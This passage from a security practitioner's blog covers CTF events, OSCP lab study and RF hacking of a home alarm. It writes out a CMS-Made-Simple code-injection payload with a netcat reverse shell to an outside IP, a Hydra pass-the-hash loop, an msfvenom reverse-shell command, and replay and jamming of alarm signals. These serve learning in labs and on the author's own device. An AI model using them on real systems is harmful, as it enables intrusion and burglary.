<string>#Fri Sep 23 18:27:15 PDT 2011
rdspassword=< redacted >
password=< redacted >
encrypted=true
</string><string>DCB6C381-FC3E-1604-E33B-88C663AAA33F</string>
<double>0.0</double><string>DCB6C381-FC2E-68D8-986E-BD28CQEDABD7</string>
<null/></object></body></amfx>"200"
INFO 500 for http://192.168.10.23:80/flex2gateway/httpsecure
INFO 200 for http://192.168.10.23:80/flex2gateway/cfamfpolling
INFO 500 for http://192.168.10.23:80/flex2gateway/amf
INFO 500 for http://192.168.10.23:80/flex2gateway/amfpolling
INFO 404 for http://192.168.10.23:80/messagebroker/http
INFO 404 for http://192.168.10.23:80/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/http
INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/samples/messagebroker/http
INFO 404 for http://192.168.10.23:80/samples/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/lcds/messagebroker/http
INFO 404 for http://192.168.10.23:80/lcds/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/http
INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/httpsecure

kilala.nl tags: , , ,

View or add comments (curr. 0)

A wonderful day at CTF036 2017

2017-03-31 22:40:00

Presenting at CTF036 about RF hacking

Today was a blast! In what has become an annual tradition, Ultimum organised the third edition of their CTF036 event

A big change since last year: I started the day not by listening, but by talking! I presented the "My first RF hack" talk, which I'd given last year at IT Gilde. In it, I outlined what I'd learned hacking the Kerui alarm system. The slides to my presentation can be found here. Reactions from the attendees were generally positive: apparently my presentation style was well-received and I'd matched the content's level to that of the crowd. 

I was followed by John Kroon, who detailed a vulnerability assessment framework he'd built, and by Sijmen Ruwhof. The latter has recently gained some fame with his public outcry regarding the Dutch voting process and the software involved. It's quite the kerfuffle!

The CTF was quite a challenge! Like last year we were presented with an A4-sized description of the target, which basically hinted at a domain name, a mail server and a DNS server. After some initial confusion about IP ranges, I got off to a start. DNSenum confirmed three hosts in one network, with two others in a deeper subnet. The three servers out in the open are respectively a web server, the mail server and a Windows host with data shares. 

Like last year, I started with the web server. This runs CMS-Made-Simple v1.1.2. Searchsploit did not list anything that seemed immediately useful, but Nikto did show me various useful subdirs, including /admin and /install. John's colleague Jordy quickly found something interesting, which relies upon /install not being deleted: CMS-MS PHP Code Injection vulnerability

By this time a few competitors had discovered something I'd missed: the Windows box had a freely accessible share with three of the sought-after accounts, worth 30 points. Of the twenty-odd competitors, three had 30 points within the first hour. 

John and I continued poking at Jordy's suggestion, with Rik across the tables following suit. I was the first to get it to work, after Jordy spurred me on. The basic process was indeed as outlined in the linked article:

  1. Set up MySQL on my own system.
  2. Make a random, empty database and grant a new account (e.g. "test") full access to the database. 
  3. The password to the user account must be: '.passthru($_GET['command']);exit;//
  4. The database must be accessible remotely (change mysql.cnf and use the appropriate GRANT, more info here).
  5. At this point you use the setup tool in /install to point CMS-MS at your own database. Uncheck the boxes in step #4. 
  6. Once you've finished the setup tool, the config.php file contains the password above, which enables you to call the base URL with an added "?command=" where you can enter any arbitrary command for the host OS. 
  7. I quickly found that the target host had /bin/netcat installed, so I could run http://www.thesmartcloud.nl/?command=/bin/netcat -e /bin/bash 172.100.23.74 443
  8. This connects to my listening netcat on port 443. Ace! (Both sides are sketched right after this list.)
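A minimal sketch of steps 7 and 8 in practice, reusing the exact command from the list above:

# On my own box: wait for the reverse shell on port 443
nc -nvlp 443

# In a second terminal (or the browser): trigger the injected passthru() via ?command=
curl 'http://www.thesmartcloud.nl/?command=/bin/netcat%20-e%20/bin/bash%20172.100.23.74%20443'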

Netcat gave me a shell as user "www-data". Poking around the host I found no abusable SUID executables, no sudo rules and no obvious methods for privesc. I did manage to grab /home/accounts.txt which contains seven accounts. Thus, for about half an hour, I was in the gleeful position of being 1st with 70 points :D 

While I kept poking at the web server and later moved on to the RoundCube/Dovecot box, I also helped John and Rik while they tried to get the CMS-MS exploit to work. Word got around quickly and a few of the guys who already had 30pts moved up to 100, with about 40mins left. I tried hard, but I couldn't find a way to score more points, so I ended up in 5th place today. 

Ultimum's Michael informed us that the maximum attainable score was 500pts, so basically none of us had gotten beyond scratching the surface by 16:00. As I said: they made it quite the challenge! It was a lot of fun!


kilala.nl tags: , ,

View or add comments (curr. 0)

More attention for bad security of home alarms

2017-03-31 19:49:00

Cover of the April CT magazine

You may recall my pen-test / security review of the Kerui alarm system, where I found that a replay attack is tremendously easy

Turns out that more people are catching on! One of the audience members at my presentation today informed me that the April issue of C'T Magazine has a cover story about this exact topic: unsafe home alarm systems. Awesome! Can't wait to read it!


kilala.nl tags: ,

View or add comments (curr. 0)

Linux in the way-way back machine!

2017-03-27 09:01:00

InfoMagic Linux box from the nineties

RedHat just posted a wonderful article to LinkedIn, that filled me with nostalgia: Test-drive Linux from 1993-2001.

My first experience with Linux was at the Hogeschool Utrecht, in Jaap's class on modern-day operating systems and networks. I've long forgotten his surname, but Jaap was always very enthusiastic about Linux and about what open source might mean for our future. In the labs, we set up Linux boxen and hooked up modems so we could make our own dial-in lines to school. None of us really knew what we were doing, just dicking around and learning as we went. It was a great experience! :)

I wanted to keep on working with Linux outside of our labs, so I hopped down to *) in Utrecht. I've forgotten what they were called at the time... Was it Donner? I dunno, we always called them "sterretje-hekje" (asterisk-hash) for their logo. They were the largest bookstore in the center of Utrecht, and their basement was dedicated to academics. Among their endless stacks of IT books I found my treasured New Hackers Dictionary (the Jargon file) and the famed InfoMagic Linux Developer's Resource CD-ROM boxset (pictured left). 

Trying the various CDs, I settled on RedHat 5.0, which ran pretty nicely on my Compaq Presario AIO. Mmmm, 450MB hard drive, 4x CD-ROM and 16MB of RAM! ;) 

Right before graduating from HU, one of the lab technicians gifted me a Televideo 950 dumb terminal. We'd used those in the OS-9 labs, while we learned assembly on the MC68000. I don't recall what hardware we used there... It was two students to a nondescript aluminum box, wired through token ring to a bright orange OS-9 server. I still wonder what that server was!

Wow... Hard to believe it's already been eighteen years!


kilala.nl tags: , ,

View or add comments (curr. 2)

CISSP certs now come with a spiffy giftbox

2017-03-01 17:10:00

When I renewed my CISSP status a few weeks ago, I knew I'd be getting a new membership card in the mail. What I didn't expect however, was to get a swanky giftbox with a nice presentation of the cert, card and a pin! Looking classy there, ISC2 :)


kilala.nl tags: ,

View or add comments (curr. 0)

Quick connection checks in Bash

2017-02-24 16:27:00

I can't believe it took me at least four years to learn about Bash's built-in Netcat equivalent /dev/tcp. And I really can't believe it took me even longer than that to learn about the timeout command!

Today I'm attempting pass-the-hash attacks on the SMB hosts in the PWK labs. After trying a few different approaches, I've settled on using Hydra to test the hashes. The downside is that Hydra can sometimes get stuck in these "child terminated, cannot connect" loops when the SMB target can't be reached. To prevent that, I'm testing the connection with Bash's /dev/tcp, which has the downside that it may also get stuck in long waiting periods if the target isn't responding correctly. Enter timeout, stage left!

for IP in $(cat smb-hosts.txt | cut -f2)
do 
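	# Probe TCP/445 via Bash's /dev/tcp; give up after 10 seconds and skip hosts that don't respond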
	timeout 10 bash -c "echo > /dev/tcp/${IP}/445"
	[[ $? -gt 0 ]] && continue

	cat hashdump2.txt | tr ':' ' ' | while read USER IDNUM HSH1 HSH2
	do 
	  echo "============================"
	  echo "Testing ${USER} at ${IP}"
	  hydra -l ${USER} -p ${HSH1}:${HSH2} ${IP} -m "LocalHash" smb -w 5 -t 1
	done
done

kilala.nl tags: , ,

View or add comments (curr. 0)

Learning more about and thanks to buffer overflows

2017-02-04 09:20:00

I'm very happy that the PWK coursebook includes no less than three prepared buffer overflow exercises to play with. The first literally takes you by the hand and leads you through building the buffer overflow attack step by step. The second (exercise 7.8.1) gives you a Windows daemon to attack and basically tells you "Right! Now do what you just did once more, but without help!" and the third falls kind of in-between while attacking a Linux daemon. Exercise 7.8.1 (vulnserver.exe) is the last one I tackled as it required lab access.

By this time I felt I had an okay grasp of the basics and I had quickly ascertained the limits within which I would have to complete my work. Things ended up taking a lot more time though, because I have a shaky understanding of the output sizing displayed by MSFVenom. For example:

root@kali:# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.177 LPORT=443 -b "\x00" -f c
...
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes

I kept looking at the "final size" line, expecting that to be the amount that I needed to pack away inside the buffer. That led me down a rabbit hole of searching for the smallest possible payload (e.g. "cmd/windows/adduser") and trying to use that. Turns out that I should not look at the "final size" line, but simply at the "payload size" value. Man, 7.8.1 is so much easier now! Because yes, just about any decent payload does fit inside the buffer part before the EIP value. 

That just leaves you with the task of grabbing a pointer towards the start of the buffer. ESP is often used, but at the point of the exploit it points towards the end of the buffer. Not a problem though, right? Just throw a little math at it! Using "nasm_shell" I found the biggest subtraction (hint: it's not 1000 like in the image) I could make without introducing NULL characters into the buffer and just combined a bunch of'm to throw ESP backwards. After that, things work just fine. 
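For illustration, here's the gist of that nasm_shell exercise as a hedged sketch; these aren't necessarily the exact values I ended up using:

# The byte-immediate form of SUB stays NULL-free up to 0x7f:
#   sub esp, 0x7f    ->  83 EC 7F           (clean)
#   sub esp, 0x1000  ->  81 EC 00 10 00 00  (NULL bytes, useless in this buffer)
# Chaining a handful of NULL-free SUBs like these walks ESP back toward the start of the buffer.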

Learning points that I should look into:


kilala.nl tags: , , ,

View or add comments (curr. 0)

PWK Labs lead times? Not today!

2017-01-27 12:28:00

Having finished 90% of my PWK exercises, it's time to get into the online labs! The final 10% of the exercises need lab access, and I need a Windows VM with a valid SLMail license. The OffSec website warns that there's usually a two to three week lead time on lab access requests. Well, apparently not today! I received an email at 12:27 saying that my lab access will start at 13:30 today. Ace!


kilala.nl tags: , ,

View or add comments (curr. 0)

OSCP and PWK studies: progress

2017-01-24 21:16:00

It's been a few weeks since I took the PWK (Pentesting With Kali Linux) course at TSTC in Veenendaal. After a short break, I've gone over the whole course book a second time: partly to keep the materials fresh in my head, but also to redo all of the exercises. By making a proper report of all the exercises, it's possible to qualify for 5 bonus points on the OSCP exam. On a minimum passing score of 70 points, that's a pretty big deal!

I'm currently busting my head on chapter 8, on Linux buffer overflows, which wasn't handled in class. I'm fine on the general concepts and execution, but I'm running afoul of a conflict between the 64-bit EDB debugger and the 32-bit application used as an example. Things aren't playing 100% nice, with an unexpected segfault currently getting in my way. 

After this, it's time to start my lab time. I've finished all the coursework as far as possible without using the labs, but now that can't be postponed anymore. 


kilala.nl tags: ,

View or add comments (curr. 0)

Getting with the times: website renovation

2017-01-19 22:18:00

It's been roughly eight years since I started work on KilalaCMS, the code that runs this website. She's served me well and I haven't had many headaches. Early on, Dick offered me lots of great help in sanitizing input, putting up at least some SQL injection protection. In the end it might not be much to look at, but she's mine :)

A few months back Dreamhost sent their customers who were still on PHP 5.5 a warning that said version would soon be dropped from their servers. In other words: a warning to go check your code. Obviously KilalaCMS was behind the times, so I've now taken some time to adjust things here and there so it works on PHP 7.0. I've also taken the liberty of defaulting everything to HTTPS, using a free SSL cert from Let's Encrypt. Dreamhost took care of the latter part for me. Good service!

I may run into a bug or two, but so far things are looking good!

EDIT: Kudos by the way to Dreamhost for their tech support! As part of the reno, I'd decided to run an "sqlmap" test against my DEV site, to make sure I wasn't leaving SQLi in plain sight. After the first tentative probe, the server slammed the door in my face! They've got their boxes set up quite nicely to prevent attacks like these. Nice! Had a chat with their support people and we worked out a nice way for me to test, without affecting my site or any of the other folks hosted on my box. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Offensive Security PWK - CTF

2016-12-16 12:37:00

Faraday Security pentest

So far I'm loving OffSec's live classroom PWK course (Pen-Testing with Kali Linux), mostly because it actually requires quite some effort while you're there. No slouching in your seats, but nose-to-the-grindstone hands-on work. But last night was a toughy! As part of the five day course, the Thursday evening offers an additional CTF where all students can take part in attacking a simulated company. 

The initial setup is quite similar to the events I'd experienced at Ultimum and at KPMG: the contestants were divided into teams and given VPN login details. In this case, the VPN connection led us straight into the target company's DMZ, of which we were given a basic sketch. A handful of servers were shown, as well as a number of routers/firewalls leading into SCADA and backoffice networks. As usual, the challenge was to own as many systems as possible and to delve as deeply into the network as you could. 

Let me tell you, practicing coursework is something completely different from trying the real deal. Here we are, with 32 hours of practice under our belt and all of a sudden we're spoilt for choice. Two dozen target hosts with all manner of OSes and software. In the end my team concluded that it was so much that it'd left our heads spinning and that we should have focused on a small number of targets instead of going wide. 

Our initial approach was very nice: get together as a group, quickly introduce each other and then form pairs. With a team of 8-10 people, working individually leads to a huge mess. Working in pairs, not only would we have two brains on one problem, but it would also leave more room for open communication. We spent the first 45 minutes on getting our VPN connections working and on recon, each pair using a different strategy. All results were then poured into Faraday on my laptop, whose dashboard was accessible to our team mates through the browser. I've been using Faraday pretty extensively during the PWK course and I'm seriously considering using it on future assignments!

After three grueling hours our team came in second, having owned only one box and having scored minor flags on other hosts. I'm grateful that the OffSec team went over a few of the targets today, taking about 30min each to discuss the approach needed to tackle each host. Very educational and the approaches were all across the board :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Continued RF hacking of a home alarm system

2016-10-21 10:57:00

Continuing where I left off last time (replay attack using a remote), I wanted to see how easy it would be to mess with the sensors attached to the Kerui home alarm system that I'm assessing. 

For starters, I assumed that each sensor would use the same HS1527 with a different set of data sent for various states. At least in the case of the magnet sensors, that assumption was correct. The bitstreams generated by one of the contacts are as follows:

As I proved last time, replaying any of these codes is trivial using an Arduino or similar equipment. Possible use cases for miscreants could include:

  1. Trick the alarm into thinking an open door is closed, before the alarm gets armed. That way the home owner does not get alerted about leaving something open when leaving the home. 
  2. Trick the alarm into thinking a window opened, after the alarm gets armed. Do this often enough, a few nights a week, and the home owner will get fed up with the alarm and just disable it. 

Going one step further I was wondering whether the simple 433Mhz transmitter for my Arduino would be capable of drowning out the professionally made magnet contacts. By using Suat Özgür's RC-Switch library again, I set the transmitter to continuously transmit a stream of ones. Basically, just shouting "AAAAAAAAAHHHHH!!!!!" down the 433MHz band.

Works like a charm, as you can see in the video below. Without the transmitter going, the panel hears the magnet contact just fine. Turning on the transmitter drowns out any of the signals sent by the contact.


kilala.nl tags: , ,

View or add comments (curr. 0)

First steps in hardware hacking

2016-10-05 08:23:00

Having come a long way in the RF-part of my current security project, I decided to dive into the hardware part of my research. The past few weeks have been spent with a loupe, my trusty multimeter, a soldering iron and some interesting hardware!

Cracking the shell of the Kerui G19 shows a pretty nice PCB! All ICs and components are on the backside, the front being dedicated to the buttons and the business end of the LCD panel. Opening the lid on the back immediately shows what look like unterminated service pins (two sets of'm), which is promising. 

What's less promising, is that the main IC is completely unmarked. That makes identifying the processor very hard, until I can take a crack at the actual firmware. My initial guess was that it's some ARM7 derivative, because the central panel mostly acts like a dressed-down feature phone with Android. A few weeks later that guess feels very, very off and it's most likely something much simpler. As user PedroDaGr8 mentioned on my Reddit thread about the PCB:

"Most people would assume an ARM in this case. In reality, it might be ARM, PIC, AVR, MIPS, FPGA, CPLD, H78, etc. Any of these could fulfill this role and function. It often depends on what the programmer or programming team is familiar with. I have seen some designs from China before, that used a WAY OVERKILL Analog Devices Blackfin DSP processor as the core. Why? Because it was cheaper to use the guys they had that were proficient at programming in Blackfin than to hire new guys for this one product."

So until I can analyse the firmware, the CPU could be just about anything! :D

There are many great guides online on the basics of hardware hacking, like DevTTYs0's "Reverse engineering serial ports" or Black Hills Security's "We can hardware hack, and you can too!". Feeling confident in their teachings, I took to those service pins with my multimeter. Sadly, both rows of headers had a number of pins that's not consistent with a UART console, but I didn't let that discourage me. Based on the measured voltages I hooked up my PL2303 UART-to-USB adapter, to see if I could find anything useful. 

No dice. Multiple pins provided output onto my Picocom console, often with interspersed Chinese unicode characters. But no pins would react to input and the output didn't look anything like a running OS or logging. 
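For reference, a hedged sketch of the baud rate sweep I mean here; the device name assumes the PL2303 shows up as /dev/ttyUSB0:

# Try the usual suspects one by one; quit picocom with C-a C-x to move on to the next rate
for BAUD in 9600 19200 38400 57600 115200
do
	picocom -b ${BAUD} /dev/ttyUSB0
done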

Between the lack of identification on the CPU and the lack of clear UART ports, it was time for hard work! I took a page from the book of Joffrey Czarny & Raphaël Rigo ("Reverse engineering hardware for software reversers", slide 11) and started mapping out all the components and traces on the PCB. Instead of using their "hobo method" with GIMP, I one-upped things by using the vector editor InkScape. My first few hours of work resulted in what you see above: a mapping of both sides of the PCB and the interconnections of most of the pins. 

Thus I learned a few things:

  1. Damn! There's at least one hidden layer of traces on the inside of the PCB. I have deduced the existence of a number of connections that cannot be visually confirmed, only by measuring resistance. 
  2. The service headers under the backside lid (CN11 and CN3) are both connected to the CPU, with CN3 probably having served to flash the firmware into the EN25-F80 EEPROM.

Status for now: lots of rewarding work and I have a great SVG to show for it. And I've gotten to know my Arduino and PL2303 a bit better. But I haven't found anything that helps me identify an OS or a console port yet. I'll keep at it!!


kilala.nl tags: , ,

View or add comments (curr. 2)

First steps in RF hacking

2016-09-20 18:05:00

The first part of my current project that I wanted to tackle, was the "RF hacking" part: capturing, analyzing, modifying and replaying the radio signals sent and received by a hardware device.

Home alarm systems (or home automation systems in general) often use one of two RF bands: 433MHz or 868MHz. As far as I understand it, 433MHz is often used by lower end or cheaper systems; I haven't figured out why just yet. In the case of the Kerui G19 alarm, the adverts tell you from the get-go that it uses 433MHz for its communications.

Cracking open one of the remotes I find one basic IC in there, the HS1527 (datasheet). The datasheet calls it an "OTP encoder", but I haven't figured out what OTP stands for in this case. I know "OTP" as "One Time Password" and that's also what the datasheet hints at ("HS1527 hai a maximum of 20 bits providing up to 1 million codes.It can reduce any code collision and unauthorized code scanning possibilities."), but it can't be that, because the Kerui remotes send out the exact same code every time. HKVStar.com has a short discussion on the HS1527, calling it a "learning code" as opposed to a "fixed code" (e.g. PT2262), but the only difference I see is 'security through obscurity', because it simply provides a large address space. There is no OTP going on here!

The datasheet does provide useful information on how its bit patterns are generated and what they look like on the output. The four buttons on the remote are tied 1:1 to the K0 through K3 inputs, so even if HS1527 can generate 16 unique codes, the remote will only make four unless you're really fast. 

After that I spent a lot of time reading various resources on RF sniffing and on 433MHz communications. Stuff like LeetUpload's articles, this article on Random Nerd, and of course lots of information at Great Scott Gadgets. Based on my reading, I put together a nice shopping list:

And cue more learning! 

GQRX turns out to be quite user-friendly and while hard to master, isn't too hard to get started with. It's even included with the Kali Linux distribution! Using GQRX I quickly confirmed that the remotes and control panel do indeed communicate around the 433MHz band, with the panel being at a slightly higher frequency than the remotes. With some tweaking and poking, I found the remote to use AM modulation without resorting to any odd trickery.

GQRX diligently gave me a WAV file that can be easily inspected in Audacity. Inspecting the WAV files indicated that each button-press on the remote would send out multiple repeats of the same bitstream. Zooming into the individual bitstreams you can make out the various patterns in the signal, but I had problems matching it to the HS1527 datasheet for the longest of times. For starters, I never saw a preamble, I counted 25 bits instead of 20+4 (address+data) and the last 4 bits showed patterns that should only occur when >1 button was pressed. 

Then it hit me: that 25th bit is the preamble! The preamble is sent back-to-back with the preceding bitstream. Doh!

Just by looking at the GQRX capture in Audacity, I can tell that the address of this particular remote is 10000100001100110001 and that 0010 is the data used for the "disarm" signal. 

Time for the next part of this experiment; let's break out the Arduino! Again, the Arduino IDE turns out to be part of the Kali Linux distro! Awesome! Some Googling led me to Suat Özgür's RC-Switch library, which comes with a set of example programs that work out of the box with the 433MHz transceivers I bought. 

Using the receiver and sniffing the "disarm" signal confirms my earlier findings:

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 9228,864,320,272,916,268,920,272,912,276,908,872,308,284,904,280,904,280,912,276,904,872,320,868,312,280,908,276,912,868,312,876,324,276,900,276,908,280,908,876,312,280,908,280,904,880,312,276,908,

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 14424,76,316,280,904,288,896,280,904,20,1432,36,1104,36,912,280,904,284,900,280,908,876,312,872,308,280,908,88,272,120,928,128,756,24,224,20,572,44,1012,32,800,24,188,32,964,68,1008,44,856,

The bitstream matches what I saw in Audacity. Using Suat's online parsing tool renders an image very similar to what we saw before.

So, what happens if we plug that same bitstream into the basic transmission program from RC-Switch? Let me show you!

If the YouTube clip doesn't show up: I press the "arm" button on the alarm system, while the Arduino in the background is sending out two "disarm" signals every 20 seconds. 

To sum it up: the Kerui G19 alarm system is 100% vulnerable to very simple replay attacks. If I were to install this system in my home, then I would never use the remote controls and I would de-register any remote that's tied to the system. 


kilala.nl tags: , ,

View or add comments (curr. 0)

New project: security assessment of a home security system

2016-08-24 20:58:00

(C) Kerui Secrui

Recently I've been seeing more and more adverts pop up for "cheap" and user-friendly home alarm systems from China. Obviously you're going to find them on Alibaba and MiniInTheBox, but western companies are also offering these systems, sometimes at elevated prices and with their own re-branding. Most of these systems are advertised as a set: a central panel with a GSM or WiFi connection, a number of sensors and a handful of remotes.

Between the apparent popularity of these systems and my own interest in further securing our home, I've been wanting to perform a security assessment of one of these Chinese home security systems. After I suggested the project to my employer, Unixerius happily footed the bill for such a kit, plus a whole bunch of extra lovely hardware to aid in the testing! 

For my first round of testing, I grabbed a Kerui G19 set from AliExpress.

I'm tackling this assessment as a learning experience, as I have no prior experience in most of the areas that I'll be attacking. I plan on having a go at the following:

The last item on the list is the only one I'm actually familiar with. The rest? Well, I'm looking forward to the challenge!

Has research like this been done before? Absolutely, I'm being far from original! One great read was Bored Hacker's "How we broke into your home". But I don't mind, as it's a great experience for me :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed my CEH and took part in a CTF

2016-07-05 20:10:00

Today was a day well spent!

This morning I passed my CEH examination in under 45 minutes. Bam-bam-bam, answers hammered out with time to spare for coffee on my way to Amstelveen. A few weeks back I'd started this course expecting some level of technical depth, but in the end I've concluded that CEH makes a nice entry-level course for managers or juniors in IT. One of my colleagues in the SOC had already warned me about that ;) I still had lots of fun with my fellow IT Gilde members, playing around during the evening-time classes set up in cooperation with TSTC.

Why go to Amstelveen? Because it's home to KPMG's beautiful offices, which is where I would take part in a CTF event co-organized by CQure! This special event served as a trial-run for a new service that KPMG will be offering to companies: CTF as a training event. Roughly twenty visitors were split across four teams, each tackling the same challenge in a dedicated VM environment. My team consisted mostly of pen-testing newbies, but we managed to make nice headway by working together and by coordinating our efforts through a whiteboard. 

This CTF was a traditional one, where the players are assumed to be attacking a company's infrastructure. All contestants were given VPN configuration data, in order to connect into the gaming environment. KPMG took things very seriously and had set up separate environments for each team, so we could have free rein over our targets. The introductory brief provided some details about the target, with regards to their web address and the specific data we were to retrieve. 

As I mentioned, our room was pretty distinct insofar that we were 90% newbies. Thus our efforts mostly consisted of reconnaissance and identifying methods of ingress. I won't go into details of the scenario, as KPMG intends to (re)use this scenario for other teams, but I can tell you that it's pretty nicely put together. It includes scripts or bots that simulate end-user behaviour, with regards to email and browser usage. 

CQure and KPMG have already announced their follow-up to this year's CTF, which will be held in April of 2017. They've left me with a great impression and I'd love to take part in their next event!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Games I love(d): Stardew Valley

2016-05-01 09:22:00

A screenshot from The Mirror

While I might play games often, I don't play a multitude of games. I like sinking quite some time into games that are really good, instead of jumping to and fro. I often get suggestions for good games from the likes of Penny Arcade or other gaming blogs/comics. Case in point: I found out about the recent indie hit Stardew Valley.

I've never played Harvest Moon games, despite knowing they're pretty darn good. I've been wanting to get into it, but never did. Imagine my joy when I learned about Stardew Valley, the bastard lovechild of Harvest Moon, Animal Crossing and the modern-day indie game and modding mentality. I'll let some reviews do the explaining: Ars Technica and PC Gamer.

Why do I love it so much? Mostly because:

It's hard to believe that all of it was made by a single person! Sure it took him four years, but still!


kilala.nl tags: ,

View or add comments (curr. 0)

Building the BoKS Puppet module

2016-04-20 20:35:00

Yesterday I published the BoKS Puppet module on Puppet Forge! So far I've sunk sixty hours into making a functional PoC, which installs and configures a properly running BoKS client. I would like to thank Mark Lambiase for offering me the chance to work on this project as a research consultant for FoxT. I'd also like to thank Ger Apeldoorn for his coaching and Ken Deschene for sparring with me. 

BoKS Puppet module at the Forge.

In case anyone is curious about my own build process for the Puppet module, I've kept a detailed journal over the past few months which has now been published as a paper on our website -> Building the BoKS Puppet module.pdf

I'm very curious about your thoughts on it all. I reckon it'll make clear that I went into this project with only limited experience, learning as I went :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A very productive week: BoKS, Puppet and security

2016-04-17 00:28:00

I have had a wonderfully productive week! Next to my daily gig at $CLIENT, I have rebuilt my burner laptop with Kali 2016 (after the recent CTF event) and I have put eight hours into the BoKS Puppet module I'm building for Fox Technologies.  

The latter has been a great learning experience, building on the training that Ger Apeldoorn gave me last year. I've had a few successes this week, by migrating the module to Hiera and by resolving a concurrency issue I was having.

With regards to running Kali 2016 on the Lenovo s21e? I've learned that the ISO for Kali 2016 does not include the old installer application in the live environment. Thus it was impossible to boot from a USB live environment to install Kali on /dev/mmcblk1pX. Instead, I opted to reinstall Kali 2, after which I performed an "apt-get dist-upgrade" to upgrade to Kali 2016. Worked very well once I put that puzzle together.
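For reference, that upgrade path boils down to pointing apt at the kali-rolling repository and dist-upgrading. A minimal sketch; the repository line below is the standard kali-rolling one, so double-check it against the current Kali documentation before use:

cat > /etc/apt/sources.list <<'EOF'
deb http://http.kali.org/kali kali-rolling main non-free contrib
EOF
apt-get update && apt-get dist-upgrade -y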


kilala.nl tags: , ,

View or add comments (curr. 0)

CTF036 security event in Almere

2016-04-01 19:01:00

My notes from CTF036

A few weeks ago Almere-local consulting firm Ultimum posted on LinkedIn about their upcoming capture the flag event CTF036. Having had my first taste of CTF at last fall's PvIB event, I was eager to jump in again! 

The morning's three lectures were awesome!

The afternoon's CTF provided the following case (summarized): "De Kiespijn Praktijk is a healthcare provider whom you are hired to attack. Your goal is to grab as many of their medical record identifiers as you can. Based on an email that you intercepted you know that they have 5 externally hosted servers, 2 of which are accessible through the Internet. They also have wifi at their offices, with Windows PCs." The maximum score would be achieved by grabbing 24 records, for 240 points. 

I didn't have any illusions of scoring any points at all, because I still don't have any pen-testing experience. For starters, I decided to run reconnaissance through two paths: the Internet and the wifi. 

As you can see from my notes it was easy to find the DKP-WIFI-D (as I was on the D-block) MAC address, for use with Reaver to crack the wifi password. Unfortunately my burner laptop lacks both the processing power and a properly sniffing wlan adapter, so I couldn't get in that way. 

I was luckier going at their servers:

  1. Sanne's home directory, which actually contained a text file with "important patients". BAM! Three medical records!!
  2. The /etc/shadow file had an easily crackable password for user Henk. Unfortunately that username+password did not let me access the .15 server through SSH or Webmin.
  3. Sanne has a mailbox! In /home/vmail I found her mailbox and it was receiving email! I used the Drupal site's password recovery to access her Drupal account. 

I thought I hadn't found anything useful with Sanne's account on the Drupal site. But boy was I wrong! 16:00 had come and gone, when my neighbor informed me that I simply should have added q=admin to Sanne's session's URL. Her admin section would have given me access to six more patient records! Six! 

Today was a well-spent day! My first time using Metasploit! My first time trying WPA2 hacking! Putting together a great puzzle to get more and more access :) Thanks Ultimum! I'm very much looking forward to next year's CTF!


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Games I love(d): League of Legends

2016-03-20 16:41:00

The four LOL ribbons

The past two years I haven't been keeping this diary, so I've played a lot of games that I really enjoyed which I haven't written about. This is the first update in a series about games that I absolutely love (or loved) and which played an important role in my life. First up: League of Legends.

LoL is the prime example of something I've often been "accused" of: "Thomas, you just can't do anything without taking it seriously!"

Let's back it up a little bit... I'd heard of MOBA games before 2014: I knew of the Warcraft 3 spinoff DotA and I'd heard about LoL from my colleague Wim. They sounded like fun games, but as is often the case I never had time to give'm a try. In the summer of 2014 I started watching the LoL championships online. Season 3 was very exciting and I loved the "Road to Worlds" documentary. 

During our holiday in Austria I picked up another MOBA, on the iPad: Fates Forever. It was a very fun game and easy to pick up for newbies like myself. I got into the community and even designed a sweater for myself, with my favorite character Renwil. FF went offline in the fall of 2015, so I can't play the game anymore.

Despite watching LoL championships and playing FF I still kept away from actually playing LoL. As my mom once told me: “Whenever we’d take you somewhere new, I’d see you hanging around the sidelines, watching very intently. You were always trying to mentally grasp what was going on and how things worked. And you almost never dared to actually participate until you’d figured it out." And that's true, I was intimidated by LoL and didn't want to fsck up right from the start. 

By the end of December 2014 I had finished a long and hard certification process (RHCE) and I told myself: "This is it! I'm gonna take three months and do nothing except gaming!". That's when I dove in! And that's where the aforementioned accusation comes in ^_^

I didn't dick around with LoL! I decided that I was going to study hard to play a limited pool of characters that each fit two roles, so I could be of good use to any team I'd join for a game. Volibear was my very first character and I shelled out the money to buy him outright. What's there not to love! A huge, friggin' polar bear with armor! I learned to play him in both toplane and the jungle. But my true love would become the support role, which is a role that suits my real life: I love being the one who supports his team, so they can win the day. Soraka is my all-time favorite character (my "main") and later on I also learned to play Janna, Annie, Lux and Morgana.

To be honest, I feel that I got pretty good. I found a few friends with whom I could play great games and I often got recognized as a valuable contributor. Over the three to four months during which I played the game, I worked myself up to level 30 (to most people the "real" start of the game) and I was awarded all four "honor ribbons" (shown top-left). I'd pore over patch notes and study pro games as well as replays of my own team's games. It was a lot of hard work, but I had an absolute blast! 

By April of 2015 the time came for me to return to studying. I started my Oracle studies by then and I also got some extra work. I said my farewells to my friends, most importantly Hedin (who played as Limerick / Dovetail) from the Faroe Islands. He was an absolute joy to play with! I never did start Ranked play, so I don't know how good I could've gotten. I'm sure that I was only on the very first step of properly learning League of Legends.


kilala.nl tags: ,

View or add comments (curr. 1)

Passed my NACA examination

2016-03-16 08:02:00

NACA logo

With many thanks to Nexpose consultant Mark Doyle for his trust in me and his coaching and with thanks to my colleagues at $CLIENT for offering me the chance to learn something new!

This morning I passed my NACA (Nexpose Advanced Certified Administrator) examination, with an 85% score.

